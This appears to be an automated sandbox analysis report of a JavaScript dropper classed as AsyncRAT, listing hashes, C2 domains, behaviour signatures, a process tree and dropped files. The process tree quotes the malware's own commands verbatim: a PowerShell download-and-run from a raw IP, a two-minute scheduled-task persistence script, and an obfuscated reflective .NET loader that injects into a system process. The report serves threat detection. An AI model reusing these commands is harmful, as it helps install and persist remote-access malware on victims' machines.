Analysis
- max time kernel: 147s
- max time network: 154s
- platform: windows10-2004_x64
- resource: win10v2004-20231127-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20231127-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 07-12-2023 07:39

Static task: static1

Behavioral task: behavioral1
- Sample: fb3c7a8f-e0ee-474d-918c-a9df0bbfe45c.js
- Resource: win7-20231023-en
General
- Target: fb3c7a8f-e0ee-474d-918c-a9df0bbfe45c.js
- Size: 7KB
- MD5: b2195fa1ea604007f7a3664e0e49f591
- SHA1: 915985302f8fb7f37d07d22a8ec5cb5e8005fb47
- SHA256: 8550509a02f745f281a2a87c1f336b0fca32bd51c1074b281e5772e5c8a6ff60
- SHA512: 478d9dcd9391a2e224bd291325dde58883d197d4cec1d989a3f054363dc03e19075e174058db828fbfc668cb76e2cd2b73782bbad3cd6a582383a62d37a8b977
- SSDEEP: 96:xBdMQYYVlVS+RwbkiEi3gkFmRePXywbkOEi3ckFmRePXuUxBbLDIX3FU3i:qQYYXVS+R9SgbEPihScbEP+cBb+3FGi
Malware Config

Extracted URLs:
- http://23.145.120.49:249/js.jpg
- https://nodejs.org/download/release/v6.17.1/win-x64/node.exe

Extracted family: asyncrat
- AWS | 3Losh
- Js
- C2: wpmediatech.com:6606, wpmediatech.com:7707, wpmediatech.com:8808
- Mutex: AsyncMutex_aloshx
- delay: 3
- install: false
- install_folder: %AppData%
Signatures

Detect ZGRat V1 (1 IoC)
- resource: behavioral2/memory/396-115-0x0000025FDB930000-0x0000025FDB988000-memory.dmp; yara_rule: family_zgrat_v1

Async RAT payload (1 IoC)
- resource: behavioral2/memory/4904-116-0x0000000000400000-0x0000000000416000-memory.dmp; yara_rule: asyncrat

Downloads MZ/PE file

Checks computer location settings (2 TTPs, 6 IoCs)
Looks up country code configured in the registry, likely geofence.
- Key value queried: \REGISTRY\USER\S-1-5-21-2037190880-819243489-950462038-1000\Control Panel\International\Geo\Nation
- Querying processes (one query each): wscript.exe, WScript.exe, cmd.exe, WScript.exe, WScript.exe, WScript.exe

Suspicious use of SetThreadContext (2 IoCs)
- PID 396 powershell.exe set thread context of PID 4904 aspnet_compiler.exe
- PID 5068 powershell.exe set thread context of PID 3580 aspnet_compiler.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Modifies registry class (1 IoC)
- Key created: \REGISTRY\USER\S-1-5-21-2037190880-819243489-950462038-1000_Classes\Local Settings, by cmd.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses (21 IoCs)
- Processes (pid): 1980 powershell.exe, 3552 powershell.exe, 4400 node.exe, 1072 node.exe, 1876 powershell.exe, 396 powershell.exe, 4904 aspnet_compiler.exe, 1972 node.exe, 5068 powershell.exe (several of these appear more than once among the 21 events)

Suspicious use of AdjustPrivilegeToken (6 IoCs)
- Token: SeDebugPrivilege, by 1980 powershell.exe, 3552 powershell.exe, 1876 powershell.exe, 396 powershell.exe, 4904 aspnet_compiler.exe, 5068 powershell.exe

Suspicious use of SetWindowsHookEx (1 IoC)
- 4904 aspnet_compiler.exe

Suspicious use of WriteProcessMemory (50 IoCs)
Unique parent → target pairs (each pair is reported two or more times among the 50 events):
- 5112 wscript.exe → 1980 powershell.exe
- 1980 powershell.exe → 1184 WScript.exe
- 1184 WScript.exe → 4300 mousocoreworker.exe
- 4300 mousocoreworker.exe → 4964 net1.exe
- 1184 WScript.exe → 2008 cmd.exe
- 2008 cmd.exe → 3552 powershell.exe
- 2008 cmd.exe → 2472 WScript.exe
- 2008 cmd.exe → 4352 WScript.exe
- 2472 WScript.exe → 4400 node.exe
- 4352 WScript.exe → 1072 node.exe
- 4400 node.exe → 4384 cmd.exe
- 4384 cmd.exe → 1876 powershell.exe
- 1072 node.exe → 4720 cmd.exe
- 4720 cmd.exe → 396 powershell.exe
- 396 powershell.exe → 4904 aspnet_compiler.exe (repeated many times)
- 3340 WScript.exe → 1972 node.exe
- 1972 node.exe → 1224 cmd.exe
- 1224 cmd.exe → 5068 powershell.exe
- 5068 powershell.exe → 3580 aspnet_compiler.exe (repeated many times)

Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

[depth 1] C:\Windows\system32\wscript.exe
Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\fb3c7a8f-e0ee-474d-918c-a9df0bbfe45c.js
- Checks computer location settings
- Suspicious use of WriteProcessMemory

[depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://23.145.120.49:249/js.jpg' -Destination 'C:\Users\Public\zip.zip'; Expand-Archive -Path 'C:\Users\Public\zip.zip' -DestinationPath 'C:\Users\Public\' -Force;Remove-Item C:\Users\Public\zip.zip; C:\Users\Public\brave.vbs
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory

[depth 3] C:\Windows\System32\WScript.exe
Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Public\brave.vbs"
- Checks computer location settings
- Suspicious use of WriteProcessMemory

[depth 4] C:\Windows\System32\net.exe
Command line: "C:\Windows\System32\net.exe" session

[depth 5] C:\Windows\system32\net1.exe
Command line: C:\Windows\system32\net1 session

[depth 4] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" "
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory

[depth 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: PowerShell -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/v6.17.1/win-x64/node.exe' -Destination 'C:\Users\Public\node.exe'"
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken

[depth 5] C:\Windows\System32\WScript.exe
Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Public\shell.js"
- Checks computer location settings
- Suspicious use of WriteProcessMemory

[depth 6] C:\Users\Public\node.exe
Command line: "C:\Users\Public\node.exe" C:\Users\Public\install.js
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory

[depth 7] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /s /c "powershell.exe -c $tr = New-Object -ComObject Schedule.Service;$tr.Connect();$ta = $tr.NewTask(0);$ta.RegistrationInfo.Description = 'Runs a script every 2 minutes';$ta.Settings.Enabled = $true;$ta.Settings.DisallowStartIfOnBatteries = $false;$st = $ta.Triggers.Create(1);$st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss');$st.Repetition.Interval = 'PT2M';$md = $ta.Actions.Create(0);$md.Path = 'C:\Users\Public\app.js';$ns = $tr.GetFolder('\');$ns.RegisterTaskDefinition('Media', $ta, 6, $null, $null, 3);"
- Suspicious use of WriteProcessMemory

[depth 8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell.exe -c $tr = New-Object -ComObject Schedule.Service;$tr.Connect();$ta = $tr.NewTask(0);$ta.RegistrationInfo.Description = 'Runs a script every 2 minutes';$ta.Settings.Enabled = $true;$ta.Settings.DisallowStartIfOnBatteries = $false;$st = $ta.Triggers.Create(1);$st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss');$st.Repetition.Interval = 'PT2M';$md = $ta.Actions.Create(0);$md.Path = 'C:\Users\Public\app.js';$ns = $tr.GetFolder('\');$ns.RegisterTaskDefinition('Media', $ta, 6, $null, $null, 3);
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken

[depth 5] C:\Windows\System32\WScript.exe
Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Public\app.js"
- Checks computer location settings
- Suspicious use of WriteProcessMemory

[depth 6] C:\Users\Public\node.exe
Command line: "C:\Users\Public\node.exe" C:\Users\Public\run.js
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory

[depth 7] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "Function OF([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$Jxxxe = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$geGWHZ = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$load = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$new1 = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$method = (Get-Content -Path 'C:\Users\Public\method.dll');$wex = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $Jxxxe;[Byte[]]$Coment = User $geGWHZ; break; } catch {; };};[Reflection.Assembly]::$load($Coment).$type($new1).$method($wex).$invoke($null,[object[]] ($Framework,$null,$JR,$true));""
- Suspicious use of WriteProcessMemory

[depth 8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell.exe -Command "Function OF([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$Jxxxe = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$geGWHZ = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$load = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$new1 = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$method = (Get-Content -Path 'C:\Users\Public\method.dll');$wex = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $Jxxxe;[Byte[]]$Coment = User $geGWHZ; break; } catch {; };};[Reflection.Assembly]::$load($Coment).$type($new1).$method($wex).$invoke($null,[object[]] ($Framework,$null,$JR,$true));"
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory

[depth 9] C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx

[depth 1] C:\Windows\System32\mousocoreworker.exe
Command line: C:\Windows\System32\mousocoreworker.exe -Embedding
- Suspicious use of WriteProcessMemory

[depth 1] C:\Windows\System32\WScript.exe
Command line: C:\Windows\System32\WScript.exe "C:\Users\Public\app.js"
- Checks computer location settings
- Suspicious use of WriteProcessMemory

[depth 2] C:\Users\Public\node.exe
Command line: "C:\Users\Public\node.exe" C:\Users\Public\run.js
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory

[depth 3] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "Function OF([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$Jxxxe = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$geGWHZ = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$load = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$new1 = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$method = (Get-Content -Path 'C:\Users\Public\method.dll');$wex = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $Jxxxe;[Byte[]]$Coment = User $geGWHZ; break; } catch {; };};[Reflection.Assembly]::$load($Coment).$type($new1).$method($wex).$invoke($null,[object[]] ($Framework,$null,$JR,$true));""
- Suspicious use of WriteProcessMemory

[depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell.exe -Command "Function OF([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$Jxxxe = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$geGWHZ = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$load = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$new1 = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$method = (Get-Content -Path 'C:\Users\Public\method.dll');$wex = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $Jxxxe;[Byte[]]$Coment = User $geGWHZ; break; } catch {; };};[Reflection.Assembly]::$load($Coment).$type($new1).$method($wex).$invoke($null,[object[]] ($Framework,$null,$JR,$true));"
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory

[depth 5] C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
- Filesize: 3KB
- MD5: e5ab5d093e49058a43f45f317b401e68
- SHA1: 120da069a87aa9507d2b66c07e368753d3061c2d
- SHA256: 4ec6d8e92ffc5b2a0db420e2d031a2226eef582d5e56d5088fc91bba77288e74
- SHA512: d44361457713abd28c49f9aa4043b76882e2b5e626816267cf3d79454c48980ba6207333f23b7976b714e090c658db36a844cb27cd6a91615014f3b06ef5623a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
- Filesize: 1KB
- MD5: 8c93b50b44099e1b2aacccdd85970e14
- SHA1: c4a546dbbcb21968583e7bcdf9ea9501ee3a0bb0
- SHA256: 802f6ffb46b82605ade11351529d38526db573e5e71858be5bc435db75b13f48
- SHA512: 1e13e0e06029c8a705dc1ad1b2dd75e31a237611fc4e82423e78bd35ca0bdaa2751e64209ef68e9c6672ea618184f21c541b7547395f8f2c25d91d61247937ee

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
- Filesize: 1KB
- MD5: 99b64d4346b7109a0b6bdb39b35fad4a
- SHA1: 16661afa04651c5e165904b61bdee5ffa37991d2
- SHA256: 4058e21da225dadf3f5ce6008dab2d9d3d997ef486963becdc53373739724966
- SHA512: c749b12fa8d3c49833c7c270ff5437dd038eaa6f4165911583c0d08d5f4ba66696deae14f8642ee95c6420728f0db804e7283871d819e7f88eb8c0fda18ff289
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
- Filesize: 2KB
- MD5: 5b54aabc7de5d1ccf5faaffecc7325cf
- SHA1: a07058a401b98ec3a0b55d9433157483dc63a541
- SHA256: 500e1f463566679c304dce99d144cac756773bcc786238fbe3855657fbee8170
- SHA512: 46f97e48aca52836f71e7b6b680d58484e750b12d49a8eb06fb9768adec8049dac2024514e187b9bb2aec57c1fd32239e8644c1683f1bb625886d0d15382a5ac

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4frmulpz.bzb.ps1
- Filesize: 60B
- MD5: d17fe0a3f47be24a6453e9ef58c94641
- SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
- SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
- SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Public\Execute.dll
- Filesize: 56B
- MD5: 529cf04db0f736467c7583ea80c3aa66
- SHA1: 7628148337b1d3d700c8151f76a1595b6f5123b8
- SHA256: 67642e56281bc4aa846689bc725f8fcc76e61c20831aa4f7e2e0c8cdba17e520
- SHA512: f612b12e1a7c2021f6c2723fe57f23aba3d1b6588f080dd67e48dc44eeaf88455e4bc6bf9caed088c63c3fb019ad8696eeb44e7bb09f8c81638779f4658ef6d4

C:\Users\Public\Framework.dll
- Filesize: 520B
- MD5: 6a08392ecf95df7fc91917dcfaae8da6
- SHA1: 480f6a5c761e1a069c0d68f5ac2aabf727791393
- SHA256: 0a572ee5508d9310936801a04237d56f118dff4dbaa98f60070988cc4b8ca460
- SHA512: d70c436183a9c6f6d4ce9296dce846f94cd12d7fbb76b24e59d88a77349a95a7a0d6ad8f9f4ffc32a98618b3250e0d35e4cf9ff1e711f4e63ffee425597dfc5e

C:\Users\Public\app.js
- Filesize: 353B
- MD5: a307c4557d5fdf209e1b38a803e03b52
- SHA1: 14e00c86caadf2ed0949dc7a3f6bffbb5b9cd0fa
- SHA256: 3a16f15174757a5f84ae743db042b62b2554620118de63be2e7086827f114bf5
- SHA512: 2c6ad68b4bfe3cd0260712da43a48f1e9b0d60d555be80560a892fb21617061f4efa02c3bb078fb0f02fdd432c48afb88e5f5ec9a05fb82124face2a27a3ac66

C:\Users\Public\brave.vbs
- Filesize: 2KB
- MD5: 8c2bd49f41e4a825fc7f030bb38143f6
- SHA1: 290b7da6cdd513b6d06deca81c288fa6f8a92b1f
- SHA256: 2b58d54f0620f94e37f97ef5d4281b9ba50e171fd542967f22a3053096315b03
- SHA512: 1d6dcbf178c4ed4f60e99b8555f2c420e550e1bb91777a4ce1f01ce2d801d964ced6ff0ca74972370b150f31d63624788380448732b50ce9ec7e58c64c3aa17d

C:\Users\Public\install.js
- Filesize: 796B
- MD5: 5727e0cb34eac044ea5495b99b7a2f8c
- SHA1: 6b99de1c9f92718e0053645c2e597d745f23ae34
- SHA256: 633dc94e7d8e997438a21ac12d05ef1614f7ef8b3df815ea19041880dd0ad8d9
- SHA512: 300fa4ce3943279b7eff9dd844e8713a1d3a414f6217d881158181440bb187f16715fc494134dc584c826ead713a8d8f9a0f4ff1e17b2b37aef09e88c5ea603b

C:\Users\Public\invoke.dll
- Filesize: 6B
- MD5: b9376e9e3c4d48f5e35a3f355ae1f74a
- SHA1: c65605adf5270f5065089b0189da542274d30db0
- SHA256: 90092e5fb861dd4ff34fa20f4b31ca44ebbb3bc367a8d7a35b89a7f89c793fa9
- SHA512: 5560101edb289c4a86476bce55648324ef188ff1e2d879a1a3bc10c1298aa643255c35d16a984f30d624fe9a87306304eaa14179863001ddd6e264e8bba17591

C:\Users\Public\load.dll
- Filesize: 4B
- MD5: f19dbf2edb3a0bd74b0524d960ff21eb
- SHA1: ddcb77ff769ea54ca622848f6bedd4004fa4f4fa
- SHA256: 8a6bdb6b18da586fe7f2acbd8f1055533f2cd97a3681b3652bcd712224df45c3
- SHA512: f0419117db6330f52eba6e7ef08a5cb096fdb02a40b1dfe4f28dd57791a11b6753e4db0fb63e1c4a22293584dc61908a8e2e99dc59a07f805e097c723329d216

C:\Users\Public\method.dll
- Filesize: 9B
- MD5: 38b97710070dbdd7b3359c0d52da4a72
- SHA1: 4ce08d2147c514f9c8e1f83d384369ec8986bc3b
- SHA256: 675f06af4e7f254d55ac605bbd7da45d9e00207a97f8a8ab7bb747d512776bc7
- SHA512: b11cec0f21dec871163d6c254850d3f807ecc4ae726b143a0c4667a25c3a3fe9283aee3f6850a2389fdce3d20f41d9c3d30f4768171137d6bdc1355a2116189c

C:\Users\Public\msg.dll
- Filesize: 129KB
- MD5: 6582381682a8618da150ce6c3de6a227
- SHA1: 0f34186a7fc3519005dcc369aab22a109ba8f2da
- SHA256: b1805c2c47cb2734111e8b03b3e305de22c4c3149fb3dff96c869df59d806e9e
- SHA512: 338b76b56fb4aa89d485f1519942fd1ab09facd5f6e06d92c1038bc53cfc389514b98065ad5ded74c1eada98d0950f218d17bab0ca2b0d4cb1ece71c9b467bdc

C:\Users\Public\node.bat
- Filesize: 604B
- MD5: 48e50f8d07d71b99772fcaff006ff53e
- SHA1: ae7caa69a56d643466003567d1560ca369bcec37
- SHA256: 360eb0a4b12c48059e0b58994bf42d9525a6cba97f6b8f4dc70fbbcfa4792957
- SHA512: 1a6fb38519a7181c20fd2465945e8dd01057ad8a223362fa8af73f91e7a079ca34ca9b76787d92ba733f02ea795a8cddacc93e33af32fe8f51a548bdec5e2438

C:\Users\Public\run.js
- Filesize: 8KB
- MD5: 9840c805e56a4b32437e7985520eda6c
- SHA1: 360d4fdc697375269b509304cb8f3ffa52df524a
- SHA256: ae5af88d556975ffb39af6c7d12da330de39a7eaaf65f6fd9c9414253e0f5334
- SHA512: 01f7d8ecb5c7d516763825c071aeb9ca786bcd686765cfb789df23a26c6b914dec259fa03a1ab190fb33a0af3e35b4c7afe11c8e9cf0d469818bdf331f6c3d67

C:\Users\Public\runpe.dll
- Filesize: 656KB
- MD5: 3afb403063fe1faf571332a4afcf238c
- SHA1: 7db1273349ddc765ccaa15c97148a849d3a300f8
- SHA256: 66980cc688f22905fcb2d034bec4777d71f8fdd30beceb4dac7a71bf7f6abeed
- SHA512: 50d975edec1ca36d817371e6dbe3e4020537d4c86076c1ba2cfd434c0bf136d0004a44bd3182a79a80bfb1da2c6eae20e5aecd1a22a6c220bb4dd76755e1ef8a

C:\Users\Public\shell.js
- Filesize: 182B
- MD5: d71e2d55ee0534b06313f71aefd921b9
- SHA1: 6c7713299bdcb1cc4046b7612775c24ddf68ad82
- SHA256: 43bdd5e0b846271a4bae3a4f74c8310b914497abd2ffe0e1886ec9fec9f25ecd
- SHA512: 6e5f222fa12d4dad713d5e8dd6a443d09ba5f715fa8701b5b26edf0f1ae8204d65eb560b003dfbc5b2f240079dc2c4eb06b9c2245de24338fa9a5c80647eb536

C:\Users\Public\type.dll
- Filesize: 7B
- MD5: be784e48d0174367297b636456c7bcf1
- SHA1: 8c906d9e0e2439238b3263e087aee3d98fa86dea
- SHA256: 510760f4c6f7fb3b5b332cd7d3a2f674235b0f58d77dbc3972adaf682a168136
- SHA512: aed58d8904742a672f9ba339069004a1c0339e6481a8949de14ee8bf2afef43f8e18e55ba4a6854a7950ee355675c26b46120e500472deaf0986f68451442ae4

C:\Users\Public\xx.dll
- Filesize: 72B
- MD5: 14c2a6b7bf15e15d8dae9cd4a56432d5
- SHA1: 0d00aa5d547ea7e6f7283221e5f3b0cc91cc6016
- SHA256: 79891821778c4ca9358c27e7fb66b0442a2921b661df1293e398b18d81da5d96
- SHA512: e476851faf540c3679225de2b224d64d117fa1857a4db7b34714d0154b8ba5ebaab50e1a6b0578759b7572e89e3df4d0d4112a7e4f5b81230931cfe6b651c63d

\??\PIPE\srvsvc
- MD5: d41d8cd98f00b204e9800998ecf8427e
- SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
- SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
- SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e